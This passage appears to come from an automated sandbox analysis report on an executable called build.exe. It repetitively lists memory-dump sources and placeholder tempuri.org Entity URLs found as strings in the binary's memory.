                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponsehD
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23LR
                        Source: build.exe, 00000006.00000002.3371472370.00000000039AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000395F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003911000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000037D3000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003873000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000038C2000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003825000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000039FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: build.exe, 00000006.00000002.3371472370.00000000033CE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000350F000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003736000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000364A000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.000000000355E000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003423000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003472000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000035FB000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003698000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000006.00000002.3371472370.0000000003785000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponsehD
